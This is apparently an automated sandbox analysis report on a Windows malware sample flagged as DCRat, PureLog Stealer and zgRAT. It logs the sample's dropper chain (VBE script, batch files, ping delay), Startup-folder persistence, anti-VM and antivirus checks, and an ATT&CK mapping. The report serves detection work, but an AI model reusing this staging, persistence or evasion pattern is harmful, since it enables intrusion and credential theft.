                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594421s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594313s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594188s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -594063s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe TID: 1832Thread sleep time: -593953s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe TID: 5104Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,0_2_00CDE6A3
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599874Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599657Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599532Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599407Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599297Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599188Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 599063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598946Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598844Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598735Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598610Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598485Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598360Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 598110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597985Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597860Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597750Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597641Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597516Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597407Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597282Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597172Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 597063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596938Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596813Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596703Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596594Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596485Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596360Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 596110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595974Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595856Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595734Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595610Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595485Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595364Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595235Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 595110Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594985Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594875Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594641Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594530Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594421Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594313Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 594063Jump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeThread delayed: delay time: 593953Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                    Source: wscript.exe, 00000001.00000003.1749162240.00000000030CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: OpenWith.exe, 0000000C.00000002.1944710952.0000020976A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
                                    Source: kIdT4m0aa4.exe, 00000000.00000003.1684661064.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4216699421.000000001BB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeAPI call chain: ExitProcess graph end nodegraph_0-25101
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC832D0 rdtsc 11_2_00007FFD9BC832D0
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]0_2_00CE7DEE
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CEC030 GetProcessHeap,0_2_00CEC030
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,0_2_00CDF9D5
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CDFBCA
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CE8EBD
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderWebSavesNet\hostcrt.exe "C:\ProviderWebSavesNet/hostcrt.exe"Jump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe" Jump to behavior
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003071000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.4",5,1,"","user","571345","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files\\Microsoft","UMNW3 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United State
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDF654 cpuid 0_2_00CDF654
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CDAF0F
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeQueries volume information: C:\ProviderWebSavesNet\hostcrt.exe VolumeInformationJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeQueries volume information: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CDDF1E
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCB146 GetVersionExW,0_2_00CCB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4216699421.000000001BB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1798966545.00000000130E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: hostcrt.exe PID: 6488, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: COBPewMCbcSeQUSyEIOt.exe PID: 764, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: services.exe PID: 4588, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1798966545.00000000130E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: hostcrt.exe PID: 6488, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: COBPewMCbcSeQUSyEIOt.exe PID: 764, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: services.exe PID: 4588, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: kIdT4m0aa4.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.hostcrt.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kIdT4m0aa4.exe.67da6f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProviderWebSavesNet\hostcrt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Media\Characters\conhost.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts141
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		12
                                    Process Injection                                    		133
                                    Masquerading                                    		OS Credential Dumping1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		11
                                    Registry Run Keys / Startup Folder                                    		11
                                    Registry Run Keys / Startup Folder                                    		1
                                    Disable or Modify Tools                                    		LSASS Memory271
                                    Security Software Discovery                                    		Remote Desktop ProtocolData from Removable Media2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAt1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		261
                                    Virtualization/Sandbox Evasion                                    		Security Account Manager2
                                    Process Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                                    Process Injection                                    		NTDS261
                                    Virtualization/Sandbox Evasion                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information                                    		LSA Secrets1
                                    Application Window Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information                                    		Cached Domain Credentials1
                                    Remote System Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Software Packing                                    		DCSync1
                                    System Network Configuration Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading                                    		Proc Filesystem3
                                    File and Directory Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow157
                                    System Information Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
